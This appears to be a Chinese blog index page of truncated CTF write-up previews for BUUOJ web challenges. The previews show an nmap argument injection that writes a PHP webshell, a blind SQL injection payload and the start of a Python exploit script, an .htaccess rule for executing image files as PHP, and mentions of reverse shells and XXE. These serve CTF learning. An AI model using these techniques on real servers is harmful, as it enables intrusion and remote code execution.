Buu摸鱼日记之22
[网鼎杯 2020 朱雀组]Nmap
这题目似曾相识,我知道是nmap 的某个参数可以写入文件然后没想起来具体是啥,谷歌了下就看到wp了
果然如此,写个马进去直接开冲
原理么就是命令执行嘛
源码:
$command = "nmap ". NMAP_ARGS . " -oX " . RESULTS_PATH . $filename . " " . $host;
$result_scan = shell_exec($command);
构造出的命令就是nmap -Pn -T4 -F –host-timeout 1000ms -oX 路径(随机生成的) 127.0.0.1 一句话没php的马 -oG hack.phtml
就行了
[BJDCTF 2nd]xss之光
拿di...
Buu摸鱼日记21
buu摸鱼日记21
[GWCTF 2019]枯燥的抽奖
考的是伪随机,像个misc题,
https://github.com/lepiaf/php_mt_seed
工具mark一下
[BJDCTF 2nd]duangShell
居然是反弹shell,大开眼界
读取源码/.index.php.swp
<body>
<center><h1>珍爱网</h1></center>
</body>
</html>
<?php
error_reporting(0);
echo "how can i give you source code? .swp?!"."<br>";
i...
Buu摸鱼日记之二十
buu摸鱼日记之二十
[NCTF2019]Fake XML cookbook
有回显xxe,看着文章一打就出
一个文章看懂XXE
[MRCTF2020]PYWebsite
这个简单,扫可以扫出/.DS_Store
里面说有个flag.php
访问说有后端验证,提到ip.XXF打之
得flag
[BJDCTF 2nd]Schrödinger
这tm属实脑洞题,建议暴打出题人
进去扫一扫,有test.php,然后让127.0.0.1扫一扫,去除时间base64值,拿到av号,然后是bilibili视频评论区有个flag
[BJDCTF2020]EasySearch
这个感觉机器有点问题貌似,明明密码对了还是error
扫出现index.php.swp,这次换了...
Buu摸鱼日记19
buu摸鱼日记19
[极客大挑战 2019]FinalSQL
现在做做,感觉geek题真的很适合入门,不仅不算很难而且确实很有新意
(还是做不来的我是人中屑)
做这个题走了一堆坑,还是修行不到家的结果
1^(ascii(substr((select(group_concat(password))from(geek.F1naI1y)),%d,1))<%d)^1
注意一下括号的书写问题,之前写进行绕过出一堆问题(调了两个小时)
import requests
url="http://762745cd-b7dc-4d95-9666-f997bed452d5.node3.buuoj.cn/search.php"
flag = ""
tablename="F1naI1y...
Buu摸鱼日记之十八
buu摸鱼日记之十八
外卖日记:今天星期一,可能是昨天大家都出去玩了大饱口福的原因,都没有什么点餐。生意很差,只有11单
[GKCTF2020]老八小超市儿
这题有点意思
本来以为是ssrf什么的,并不是
shopxo是一个cms,有洞可以网上找
admin.php有管理页面,标准密码和账号
然后可以通过上传马,换主题来getshell
flag所在文件夹无权限,可以利用有root权限的定时脚本来实现
http://8c8003d7-d8b6-47b4-a56a-d4bdf05c29cb.node3.buuoj.cn(我手滑把flag搞没了,又得打一次QWQ)
[网鼎杯 2020 朱雀组]phpweb
很有意思的题目
抓包会发现post一个func一个p 测试发...
Buu摸鱼日记之十五
buu摸鱼日记之十五
[MRCTF2020]你传你🐎呢
记录一下,.htaccess用法
概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。
这样子,apache就会用php的方法去解析这个马,然后就可以用png马来getshell
<FilesMatch "ma.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
[安洵杯 2019]easy_serialize_php
...
40 post articles, 5 pages.